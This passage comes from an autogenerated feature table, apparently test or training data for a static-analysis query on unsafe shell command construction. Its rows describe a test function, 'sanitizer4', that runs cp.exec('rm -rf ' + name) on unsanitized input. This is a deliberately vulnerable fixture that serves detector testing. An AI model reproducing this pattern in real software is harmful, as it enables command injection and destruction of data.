name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:6:515:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:6:515:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:6:515:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:6:515:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:6:515:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:11:515:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:23:515:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:23:515:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:23:515:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:23:515:26 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:23:515:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:23:515:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:10 | isNaN | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:10 | isNaN | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:10 | isNaN | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:10 | isNaN | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:10 | isNaN | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | exceptional return of isNaN(p ... (name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | exceptional return of isNaN(p ... (name)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | exceptional return of isNaN(p ... (name)) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | exceptional return of isNaN(p ... (name)) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | exceptional return of isNaN(p ... (name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | isNaN(p ... (name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | isNaN(p ... (name)) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | isNaN(p ... (name)) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | isNaN(p ... (name)) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | isNaN(p ... (name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:19 | parseInt | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:19 | parseInt | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:19 | parseInt | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:19 | parseInt | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:19 | parseInt | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:25 | exceptional return of parseInt(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:25 | exceptional return of parseInt(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:25 | exceptional return of parseInt(name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:25 | exceptional return of parseInt(name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:25 | exceptional return of parseInt(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:21:518:24 | name | CalleeFlexibleAccessPath | parseInt | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:21:518:24 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:21:518:24 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:21:518:24 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:21:518:24 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:21:518:24 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:21:518:24 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:9 | cp.exec | 